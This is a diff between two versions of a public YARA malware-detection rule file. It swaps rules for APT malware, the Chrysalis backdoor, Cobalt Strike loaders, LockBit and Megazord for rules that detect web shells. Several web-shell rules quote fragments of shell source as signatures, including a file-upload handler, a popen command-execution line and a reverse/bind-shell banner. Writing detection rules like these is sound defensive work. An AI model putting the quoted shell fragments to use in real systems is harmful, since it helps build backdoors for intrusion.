+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4552-L4563"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c231158e44de01585e9fb4bd9768b388016972e2026e049070cdc6cd35362609"
+		hash = "a2f8fa4cce578fc9c06f8e674b9e63fd"
+		logic_hash = "2d5b6e08bfe9e1551dab12b01189dadc924c097427c996684bab96c48d528395"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$s1 = " -> Missing element in DataDir -- cannot install" ascii
-		$s2 = " -> Primary loader not present in the DataDir" ascii
-		$s3 = "\\\\.\\amxpci" fullword ascii
-		$s4 = " -> [Goad] ERROR in CreateFile:" fullword ascii
-		$s5 = "\\\\.\\Sandra" fullword ascii
-		$s6 = " -> [Sandra] RingZeroCode" fullword ascii
-		$s7 = " -> [Sandra] Value from IOCTL_RDMSR:" fullword ascii
+		$s0 = "echo \"</form><form action=\\\"$SFileName?$urlAdd\\\" method=\\\"post\\\"><input"
+		$s1 = "echo \"<form action=\\\"$SFileName?$urlAdd\\\" method=\\\"POST\\\"><input type="
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3000KB and 1 of them
+		all of them
 }
-
-rule SIGNATURE_BASE_Slingshot_APT_Malware_1 : FILE
+rule SIGNATURE_BASE_Ayyildiz_Tim___AYT__Shell_V_2_1_Biz_Html
 {
 	meta:
-		description = "Detects malware from Slingshot APT"
-		author = "Florian Roth (Nextron Systems)"
-		id = "72f4a52b-c70b-511f-acf5-6d680a95c7d6"
-		date = "2018-03-09"
-		modified = "2023-12-05"
-		reference = "https://securelist.com/apt-slingshot/84312/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_slingshot.yar#L60-L79"
+		description = "Semi-Auto-generated  - file Ayyildiz Tim  -AYT- Shell v 2.1 Biz.html.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "d50a8669-fd28-59d2-9f00-f4fe2b85dc22"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4564-L4577"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "43cf94058fe3833a4623ecb784eea50e199536d4903fb9457843b7b5e9a244e3"
+		hash = "8a8c8bb153bd1ee097559041f2e5cf0a"
+		logic_hash = "9e2d56b49df65a2c13e15f97ec91cdbb6852d86e86f921d7c8a4db82cbea12f5"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "4b250304e28648574b441831bf579b844e8e1fda941fb7f86a7ea7c4291bbca6"
+		tags = ""
 
 	strings:
-		$s1 = "SlingDll.dll" fullword ascii
-		$s2 = "BogusDll." ascii
-		$s3 = "smsvcrt -h 0x%p" fullword wide
+		$s0 = "Ayyildiz"
+		$s1 = "TouCh By iJOo"
+		$s2 = "First we check if there has been asked for a working directory"
+		$s3 = "http://ayyildiz.org/images/whosonline2.gif"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 700KB and ( pe.imphash ( ) == "7ead4bb0d752003ce7c062adb7ffc51a" or pe.exports ( "WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW0000" ) or 1 of them )
+		2 of them
 }
-rule SIGNATURE_BASE_Slingshot_APT_Malware_2 : FILE
+rule SIGNATURE_BASE_EFSO_2_Asp
 {
 	meta:
-		description = "Detects malware from Slingshot APT"
-		author = "Florian Roth (Nextron Systems)"
-		id = "b85d3d81-0148-5ea0-9eff-d9bb63e3e75b"
-		date = "2018-03-09"
-		modified = "2023-12-05"
-		reference = "https://securelist.com/apt-slingshot/84312/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_slingshot.yar#L81-L100"
+		description = "Semi-Auto-generated  - file EFSO_2.asp.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "f0566790-b41c-5167-b7ec-19e7d04256d1"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4578-L4589"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d56dadf747c64cb518ddc9aaee38fd50c67fe7344d7569d9ef3169099e7f36c5"
+		hash = "b5fde9682fd63415ae211d53c6bfaa4d"
+		logic_hash = "15e5419854bcbb08f28fff1e266cca7a004f01ec0a5c313c107ec17c3aa7ffee"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "2a51ef6d115daa648ddd57d1e4480f5a18daf40986bfde32aab19349aa010e67"
+		tags = ""
 
 	strings:
-		$x1 = "\\\\?\\c:\\RECYCLER\\S-1-5-21-2225084468-623340172-1005306204-500\\INFO5" fullword wide
-		$x_slingshot = {09 46 BE 57 42 DD 70 35 5E }
-		$s1 = "Opening service %s for stop access failed.#" fullword wide
-		$s2 = "LanMan setting <%s> is ignored because system has a higher value already." fullword wide
-		$s3 = "\\DosDevices\\amxpci" wide
-		$s4 = "lNTLMqSpPD" fullword ascii
+		$s0 = "Ejder was HERE"
+		$s1 = "*~PU*&BP[_)f!8c2F*@#@&~,P~P,~P&q~8BPmS~9~~lB~X`V,_,F&*~,jcW~~[_c3TRFFzq@#@&PP,~~"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 900KB and ( 1 of ( $x* ) or 4 of them )
+		2 of them
 }
-
-rule SIGNATURE_BASE_Slingshot_APT_Malware_3 : FILE
+rule SIGNATURE_BASE_Lamashell_Php
 {
 	meta:
-		description = "Detects malware from Slingshot APT"
-		author = "Florian Roth (Nextron Systems)"
-		id = "4ef1f9a6-3d80-545e-8ac3-c6d46c71fca1"
-		date = "2018-03-09"
-		modified = "2023-12-05"
-		reference = "https://securelist.com/apt-slingshot/84312/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_slingshot.yar#L102-L122"
+		description = "Semi-Auto-generated  - file lamashell.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "cbbb3377-ef9c-5fd1-a8b8-2b730fb5ef28"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4590-L4602"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "420c54ce90a13258e0dd54524fe7df4dd97d3e8f1eeaa8ca14350670a87e87c6"
+		hash = "de9abc2e38420cad729648e93dfc6687"
+		logic_hash = "5e156c3057338fa7b306b91dd979851dd56b8b698cfe99e1d7b6d096a4c580e7"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "fa513c65cded25a7992e2b0ab03c5dd5c6d0fc2282cd64a1e11a387a3341ce18"
+		tags = ""
 
 	strings:
-		$a1 = "chmhlpr.dll" fullword ascii
-		$s2 = "%hc%hc%hc%hc" fullword ascii
-		$s3 = "%hc%hc%hc=" fullword ascii
-		$s4 = "%hc%hc==" fullword ascii
+		$s0 = "lama's'hell" fullword
+		$s1 = "if($_POST['king'] == \"\") {"
+		$s2 = "if (move_uploaded_file($_FILES['fila']['tmp_name'], $curdir.\"/\".$_FILES['f"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and ( pe.imphash ( ) == "2f3b3df466e24e0792e0e90d668856bc" or pe.exports ( "dll_u" ) or ( $a1 and 2 of ( $s* ) ) )
+		1 of them
 }
-rule SIGNATURE_BASE_Slingshot_APT_Malware_4 : FILE
+rule SIGNATURE_BASE_Ajax_PHP_Command_Shell_Php
 {
 	meta:
-		description = "Detects malware from Slingshot APT"
-		author = "Florian Roth (Nextron Systems)"
-		id = "0f957330-1834-550f-ba5d-fb2bf0dfba7f"
-		date = "2018-03-09"
-		modified = "2023-12-05"
-		reference = "https://securelist.com/apt-slingshot/84312/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_slingshot.yar#L124-L144"
+		description = "Semi-Auto-generated  - file Ajax_PHP Command Shell.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "cae2e035-ae7b-589b-b2d9-e709028274c5"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4603-L4615"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a9f4b7b4079ebd5ffbee4c82032d28b0015968cb369fae2b0f19b054bf5a1c3c"
+		hash = "93d1a2e13a3368a2472043bd6331afe9"
+		logic_hash = "37cba26018f3d37194a143871012a61a7bcee6775d2cf5f93a52b779010d3260"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "38c4f5320b03cbaf5c14997ea321507730a8c16906e5906cbf458139c91d5945"
+		tags = ""
 
 	strings:
-		$x1 = "Ss -a 4104 -s 257092 -o 8 -l 406016 -r 4096 -z 315440" fullword wide
-		$s1 = "Slingshot" fullword ascii
-		$s2 = "\\\\?\\e:\\$Recycle.Bin\\" wide
-		$s3 = "LineRecs.reloc" fullword ascii
-		$s4 = "EXITGNG" fullword ascii
+		$s1 = "newhtml = '<b>File browser is under construction! Use at your own risk!</b> <br>"
+		$s2 = "Empty Command..type \\\"shellhelp\\\" for some ehh...help"
+		$s3 = "newhtml = '<font size=0><b>This will reload the page... :(</b><br><br><form enct"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( $x1 or 2 of them )
+		1 of them
 }
-rule SIGNATURE_BASE_MAL_Chrysalis_Dllloader_Feb26 : FILE
+rule SIGNATURE_BASE_Jspwebshell_1_2_Jsp
 {
 	meta:
-		description = "Detects DLL used to load Chrysalis backdoor, seen being used in the compromise of the infrastructure hosting Notepad++ by Chinese APT group Lotus Blossom"
-		author = "X__Junior"
-		id = "e7be7399-98e3-5809-bee5-c32e86c896ba"
-		date = "2026-02-02"
-		modified = "2026-02-04"
-		reference = "https://www.rapid7.com/blog/post/tr-chrysalis-backdoor-dive-into-lotus-blossoms-toolkit/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/lotusblossom_notepad_exploitation.yar#L1-L14"
+		description = "Semi-Auto-generated  - file JspWebshell 1.2.jsp.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "edfe6a3d-7d56-52ad-a376-cec5722e87b7"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4616-L4629"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "3bdc4c0637591533f1d4198a72a33426c01f69bd2e15ceee547866f65e26b7ad"
-		logic_hash = "5e118287bd048788a746d412d00ddd2596224b30562d66c4441738fcc09cee87"
-		score = 80
+		hash = "70a0ee2624e5bbe5525ccadc467519f6"
+		logic_hash = "32b3ddb00f89a3540118fe8ce5fc070556b00030dcf2b21245d38ae66e6cbc14"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$op1 = { 33 D2 8B C1 F7 F6 0F B6 C1 03 55 ?? 6B C0 ?? 32 02 88 04 0F 41 83 F9 ?? 72 }
-		$op2 = { 0F B6 04 31 41 33 C2 69 D0 ?? ?? ?? ?? 3B CB 72 }
+		$s0 = "JspWebshell"
+		$s1 = "CreateAndDeleteFolder is error:"
+		$s2 = "<td width=\"70%\" height=\"22\">&nbsp;<%=env.queryHashtable(\"java.c"
+		$s3 = "String _password =\"111\";"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		2 of them
 }
-rule SIGNATURE_BASE_MAL_Chrysalis_Shellcode_Loader_Feb26
+rule SIGNATURE_BASE_Sincap_Php_Php
 {
 	meta:
-		description = "Detects shellcode used to load Chrysalis backdoor, seen being used in the compromise of the infrastructure hosting Notepad++ by Chinese APT group Lotus Blossom"
-		author = "X__Junior"
-		id = "0d0feee2-f0af-5b7d-95a2-7108448fb0e5"
-		date = "2026-02-02"
-		modified = "2026-02-04"
-		reference = "https://www.rapid7.com/blog/post/tr-chrysalis-backdoor-dive-into-lotus-blossoms-toolkit/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/lotusblossom_notepad_exploitation.yar#L16-L29"
+		description = "Semi-Auto-generated  - file Sincap.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "8c4dc7b1-94ce-5528-8442-eae05d2c9980"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4630-L4642"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "e2e3d78437cf9d48c2b2264e44bb36bc2235834fc45bbb50b5d6867f336711e3"
-		logic_hash = "1baf027548cc1f501e2f99d4a337eaafec1e8ac2c48420cbff25c396083b6273"
-		score = 80
+		hash = "b68b90ff6012a103e57d141ed38a7ee9"
+		logic_hash = "e708a7dcb26ff7d0208c1f092e14e701f2ae94c4ffca019f13064bbe04ef74d7"
+		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$op1 = { 8B C7 03 D7 83 E0 ?? 47 8A 4C 05 ?? 8A 04 13 02 C1 32 C1 2A C1 88 02 8B 55 ?? 3B FE 7C ?? 8B 5D ?? 8B 45 }
-		$op2 = { 03 F8 8B 45 ?? 8B 50 ?? 85 C9 79 ?? 0F B7 C1 EB ?? 8D 41 ?? 03 C3 50 FF 75 ?? FF D2 89 07 85 C0 74 ?? 8B 4D ?? 46 }
+		$s0 = "$baglan=fopen(\"/tmp/$ekinci\",'r');"
+		$s2 = "$tampon4=$tampon3-1"
+		$s3 = "@aventgrup.net"
 
 	condition:
-		1 of them
+		2 of them
 }
-rule SIGNATURE_BASE_MAL_Chrysalis_Backdoor_Feb26
+rule SIGNATURE_BASE_Test_Php_Php
 {
 	meta:
-		description = "Detects Chrysalis backdoor, seen being used in the compromise of the infrastructure hosting Notepad++ by Chinese APT group Lotus Blossom"
-		author = "X__Junior"
-		id = "e555ff63-63ac-572a-8b3b-8b7d40bf92aa"
-		date = "2026-02-02"
-		modified = "2026-02-04"
-		reference = "https://www.rapid7.com/blog/post/tr-chrysalis-backdoor-dive-into-lotus-blossoms-toolkit/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/lotusblossom_notepad_exploitation.yar#L31-L48"
+		description = "Semi-Auto-generated  - file Test.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "58d73264-6507-5560-ad3e-0cc86c2ee291"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4643-L4655"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "e2e3d78437cf9d48c2b2264e44bb36bc2235834fc45bbb50b5d6867f336711e3"
-		logic_hash = "9df8794d9927b92f0810321901aa7836f6a404d48c121818f24473e92875ecc4"
-		score = 80
+		hash = "77e331abd03b6915c6c6c7fe999fcb50"
+		logic_hash = "575a2eeadc8113d779057f98e978ed4f8914546117b57944bf65f1d6d84c9521"
+		score = 50
 		quality = 85
 		tags = ""
 
 	strings:
-		$opa1 = { 8B 4D ?? C1 CF ?? C1 C1 ?? 03 F9 D1 C3 8B 4D ?? C1 C1 ?? 03 F9 03 FB 8B 5D ?? 69 CF ?? ?? ?? ?? BF ?? ?? ?? ?? 2B F9 EB }
-		$opa2 = { F7 E9 [0-1] 8B C2 C1 E8 ?? 03 C2 8D 0C 40 8A C3 34 ?? [0-2] 0F B6 [1-4] 0F B6 C3 8B 5D [1-3] 0F 45 D0 }
-		$opb1 = { 0F B6 84 35 ?? ?? ?? ?? 88 84 3D ?? ?? ?? ?? 88 8C 35 ?? ?? ?? ?? 0F B6 84 3D ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 03 C2 0F B6 C0 0F B6 84 05 ?? ?? ?? ?? 30 04 19 43 3B 9D ?? ?? ?? ?? 7C }
+		$s0 = "$yazi = \"test\" . \"\\r\\n\";" fullword
+		$s2 = "fwrite ($fp, \"$yazi\");" fullword
+		$s3 = "$entry_line=\"HACKed by EntriKa\";" fullword
 
 	condition:
-		(1 of ( $opa* ) and $opb1 ) or all of ( $opa* )
+		1 of them
 }
-rule SIGNATURE_BASE_MAL_Cobaltstrike_Beacon_Loader_Feb26 : FILE
+rule SIGNATURE_BASE_Phyton_Shell_Py
 {
 	meta:
-		description = "Detects Cobalt Strike beacon loader"
-		author = "X__Junior"
-		id = "1080e9f0-8830-5f8f-b249-65804be3c788"
-		date = "2026-02-02"
-		modified = "2026-02-04"
-		reference = "https://www.rapid7.com/blog/post/tr-chrysalis-backdoor-dive-into-lotus-blossoms-toolkit/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/lotusblossom_notepad_exploitation.yar#L50-L69"
+		description = "Semi-Auto-generated  - file Phyton Shell.py.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "2f55d60d-94f3-508d-a2d0-5ab59e3fdab3"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4656-L4669"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "0a9b8df968df41920b6ff07785cbfebe8bda29e6b512c94a3b2a83d10014d2fd"
-		hash = "b4169a831292e245ebdffedd5820584d73b129411546e7d3eccf4663d5fc5be3"
-		logic_hash = "949e70b1fb7f270a05d1626a12595ecab22bdec37a07e83c5cf64399506302a5"
-		score = 80
+		hash = "92b3c897090867c65cc169ab037a0f55"
+		logic_hash = "ac16a95cd1fb09c93b315e3cd7d57c1ebec322b641f515854fb73a61393dd365"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$opa1 = { 45 33 C9 41 B8 ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 66 89 44 24 ?? 41 B8 ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ?? 0F B7 4C 24 ?? FF 15 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? FF 15 }
-		$opa2 = { 4C 8D 4C 24 ?? 41 B8 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 48 89 4C 24 ?? 4C 8D 0D ?? ?? ?? ?? 45 33 C0 33 D2 48 8B C8 FF 15 }
-		$opb1 = { 48 8D 89 ?? ?? ?? ?? 0F 10 00 0F 10 48 ?? 48 8D 80 ?? ?? ?? ?? 0F 11 41 ?? 0F 10 40 ?? 0F 11 49 ?? 0F 10 48 ?? 0F 11 41 ?? 0F 10 40 ?? 0F 11 49 ?? 0F 10 48 ?? 0F 11 41 ?? 0F 10 40 ?? 0F 11 49 ?? 0F 10 48 ?? 0F 11 41 ?? 0F 11 49 ?? 48 83 EA }
-		$opb2 = { 45 33 C9 48 89 84 24 ?? ?? ?? ?? 41 B8 18 00 00 00 C7 84 24 ?? ?? ?? ?? 03 00 00 00 48 8D 94 24 ?? ?? ?? ?? 48 89 BC 24 ?? ?? ?? ?? B9 B9 00 00 00 FF 15 }
+		$s1 = "sh_out=os.popen(SHELL+\" \"+cmd).readlines()" fullword
+		$s2 = "#   d00r.py 0.3a (reverse|bind)-shell in python by fQ" fullword
+		$s3 = "print \"error; help: head -n 16 d00r.py\"" fullword
+		$s4 = "print \"PW:\",PW,\"PORT:\",PORT,\"HOST:\",HOST" fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of ( $opa* ) or all of ( $opb* )
+		1 of them
 }
-rule SIGNATURE_BASE_MAL_POC_Microsoft_Warbird_Loader_Feb26 : FILE
+rule SIGNATURE_BASE_Mysql_Tool_Php_Php
 {
 	meta:
-		description = "Detects a POC to turn Microsoft Warbird into a shellcode loader"
-		author = "X__Junior"
-		id = "52130f51-2058-51f7-87ce-570dc4c2f00c"
-		date = "2026-02-03"
-		modified = "2026-02-04"
-		reference = "https://cirosec.de/en/news/abusing-microsoft-warbird-for-shellcode-execution/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/lotusblossom_notepad_exploitation.yar#L71-L83"
+		description = "Semi-Auto-generated  - file mysql_tool.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "c67197d1-6e40-5bf2-9e1b-6ada43529435"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4670-L4682"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "29d0467ee452752286318f350ceb28a2b04ee4c6de550ba0edc34ae0fa7cbb03"
-		logic_hash = "daeae01f0d5103974ed011322db3b6a833ee0f67b8739a4e63d6b18704ffa605"
+		hash = "5fbe4d8edeb2769eda5f4add9bab901e"
+		logic_hash = "9f49bd6c56c919f678ecada82ff3d801c82c98a8abdee85cda1ec7e5b6756012"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$op = { fe af fe ca ef be ad de }
+		$s0 = "$error_text = '<strong>Failed selecting database \"'.$this->db['"
+		$s1 = "$ra44  = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = $_SERV"
+		$s4 = "<div align=\"center\">The backup process has now started<br "
 
 	condition:
-		uint16( 0 ) == 0x5a4d and $op
+		1 of them
 }
-rule SIGNATURE_BASE_Mal_Lockbit4_Hashing_Alg_Win_Feb24 : FILE
+rule SIGNATURE_BASE_Zehir_4_Asp
 {
 	meta:
-		description = "This rule detects the custom hashing algorithm of Lockbit4.0 unpacked"
-		author = "0x0d4y"
-		id = "e91aedba-6f70-4ca2-9217-2991cbbc6e8d"
-		date = "2024-02-16"
-		modified = "2025-03-20"
-		reference = "https://0x0d4y.blog/lockbit4-0-evasion-tales/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_lockbit4_hashing_alg_win_feb24.yar#L1-L22"
+		description = "Semi-Auto-generated  - file Zehir 4.asp.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "ea7df4e1-d4e2-5a58-a014-d12cb9afaf79"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4683-L4694"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "062311f136d83f64497fd81297360cd4"
-		logic_hash = "41497ea30a4cfdd111726a5819ec404a1eeba1693f5d6b89ac38558eb1c6bde9"
-		score = 100
+		hash = "7f4e12e159360743ec016273c3b9108c"
+		logic_hash = "69063d866daf1709df81fa22d76177bf8d552e19725a94db4a1b2fca79387faf"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "CC BY 4.0"
-		rule_matching_tlp = "TLP:WHITE"
-		rule_sharing_tlp = "TLP:WHITE"
-		malpedia_family = "win.lockbit"
+		tags = ""
 
 	strings:
-		$hashing_alg = { 41 89 d0 46 0f be 04 00 45 09 c0 74 ?? 45 8d 48 ?? 45 8d 50 ?? 41 80 f9 ?? 45 0f 43 d0 44 31 d1 44 8d 04 3a 45 0f af c2 41 01 c8 89 d1 31 f9 09 d2 0f 44 ca 41 0f af c8 44 01 d1 ff c2 eb ?? 49 ff c6 }
+		$s2 = "</a><a href='\"&dosyapath&\"?status=10&dPath=\"&f1.path&\"&path=\"&path&\"&Time="
+		$s4 = "<input type=submit value=\"Test Et!\" onclick=\""
 
 	condition:
-		uint16( 0 ) == 0x5a4d and $hashing_alg
+		1 of them
 }
-rule SIGNATURE_BASE_MAL_WIN_Megazord_Apr25 : FILE
+rule SIGNATURE_BASE_Sh_Php_Php
 {
 	meta:
-		description = "This Yara rule from ISH Tecnologia's Heimdall Security Research Team, detects the main components of the Megazord Ransomware"
-		author = "0x0d4y-Icaro Cesar"
-		id = "6225a690-8f54-4a50-a19a-8f7523537228"
-		date = "2025-04-11"
-		modified = "2025-04-16"
-		reference = "https://ish.com.br/wp-content/uploads/2025/04/A-Anatomia-do-Ransomware-Akira-e-sua-expansao-multiplataforma.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_win_megazord_apr25.yar#L1-L30"
+		description = "Semi-Auto-generated  - file sh.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "da691516-d6c9-5c4b-85c3-f1cd7fc96ae7"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4695-L4706"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "fd380db23531bb7bb610a7b32fc2a6d5"
-		logic_hash = "1a73e67b9a43c4f1bbe9f3dbebeb428bbfa705f7c858909a7bbf0673951d677e"
-		score = 80
+		hash = "330af9337ae51d0bac175ba7076d6299"
+		logic_hash = "b0c3307d451e5d7dadece114e2888503a46038e2edb2ff32bf566ce47b300e76"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		rule_matching_tlp = "TLP:WHITE"
-		rule_sharing_tlp = "TLP:WHITE"
-		malpedia_family = "win.akira"
+		tags = ""
 
 	strings:
